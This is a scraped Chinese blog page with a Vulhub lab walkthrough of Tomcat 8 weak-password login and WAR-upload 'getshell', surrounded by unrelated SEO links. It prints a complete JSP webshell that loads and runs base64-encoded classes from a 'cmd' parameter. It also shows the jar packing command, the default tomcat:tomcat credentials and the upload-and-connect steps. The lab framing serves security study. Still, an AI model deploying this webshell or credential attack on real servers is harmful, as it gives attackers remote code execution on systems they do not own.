当前位置: 首页 > news >正文

中英文网站切换wordpress 外贸 开发

中英文网站切换,wordpress 外贸 开发,网站定制功能,软件界面设计工具免费感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号漏洞名称Tomcat7 弱口令 && 后台getshell漏洞漏洞评级高…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞扫描
        • 3、漏洞验证

说明内容
漏洞编号
漏洞名称Tomcat7+ 弱口令 && 后台getshell漏洞
漏洞评级高危
影响范围Tomcat 版本:8.0
漏洞描述Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限
tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击
修复方案

1.1、漏洞描述

Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限

Tomcat7+权限分为:

  • manager(后台管理)
    • manager-gui 拥有html页面权限
    • manager-status 拥有查看status的权限
    • manager-script 拥有text接口的权限,和status权限
    • manager-jmx 拥有jmx权限,和status权限
  • host-manager(虚拟主机管理)
    • admin-gui 拥有html页面权限
    • admin-script 拥有text接口权限

这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html

conf/tomcat-users.xml文件中配置用户的权限:

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"version="1.0"><role rolename="manager-gui"/><role rolename="manager-script"/><role rolename="manager-jmx"/><role rolename="manager-status"/><role rolename="admin-gui"/><role rolename="admin-script"/><user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" /></tomcat-users>

可见,用户tomcat拥有上述所有权限,密码是tomcat

正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。

1.2、漏洞等级

高危

1.3、影响版本

Tomcat 版本:8.0

1.4、漏洞复现

1、基础环境

Path:Vulhub/tomcat/tomcat8


启动测试环境:

sudo docker-compose up -d

访问http://your-ip:8080/即可看到

在这里插入图片描述

点击Manager App即可跳到管理登陆页面

在这里插入图片描述

输入用户名密码 tomcat:tomcat,来到管理界面

在这里插入图片描述

2、漏洞扫描
3、漏洞验证

登录到后台后可以通过部署war包进行getshell

找一个a.jsp木马

<%!class U extends ClassLoader {U(ClassLoader c){super(c);}public Class g(byte[] b){return super.defineClass(b,0,b.length);}}public byte[] base64Decode(String str) throws Exception{try{Class clazz =Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);}catch (Exception e){Class clazz =Class.forName("java.util.Base64");Object decoder =clazz.getMethod("getDecoder").invoke(null);return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);}}
%>
<% String cls =request.getParameter("cmd");if(cls != null){new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 }
%>

打包成war

jar cvf tomcat.war a.jsp

在这里插入图片描述

上传打包的tomcat.war

生成一个tomcat的路径

在这里插入图片描述

在地址栏路径中访问http://192.168.80.141:8080/tomcat/a.jsp

在这里插入图片描述

蚁剑连接,密码cmd

在这里插入图片描述

http://www.15wanjia.com/news/172379.html

相关文章:

  • 河南网站建设公司宣传网站建设方案
  • 英文网站标题字体phpcms v9 网站建设设计制作网络科技模板
  • wordpress背景图如何设置绍兴seo淄博公司
  • 中国建设银行笔试确认网站安徽省建设干部学校培训网站
  • 做宣传语的网站南昌网站建设赣icp南昌
  • 用什么软件上传网站不用网络的游戏
  • 什么网站可以自己做房子设计图太原网络营销招聘
  • vs2017移动网站开发马格南摄影网站
  • 公司手机网站模板免费下载前端开发培训学校
  • IT男为女朋友做的求婚网站粤嵌培训4个月收费
  • 500强企业网站有哪些长春建设股份有限公司
  • 免费网站收录北京门户网站制作
  • 建设银行网站收款怎么打明细wordpress登陆页文件
  • 上海网站建设的价格成都网站建设制作价格
  • 网站建设 秦皇岛公司哪家好做本地网站怎么挣钱
  • 茌平网站建设价格辽宁省建设工程招投标
  • 广州市官网网站建设平台营销型网站建设教程
  • 网站不显示内容做门户网站需要什么条件
  • 收录优美的图片莱芜seo排名
  • 响应式网站建设模板如果在阿里云上做自己的网站
  • 微信公众号搭建微网站自己做网站还是开通阿里巴巴诚信通
  • 网站建设全教程wordpress 远程附件
  • 动易网站官网在北京注册公司流程及费用
  • 做网站前需要准备什么条件网站开发下单功能
  • 天水市建设局网站公告河北省建设厅办事大厅网站
  • 局域网内个人网站建设各城市首轮感染高峰期预测
  • codeigniter 手机网站开发wordpress 角色后台权限
  • 建站行业发展wordpress音乐播放页面
  • 成都网站建设服务平台万全网站建设
  • 机床回收网站建设开发公司退房款代理词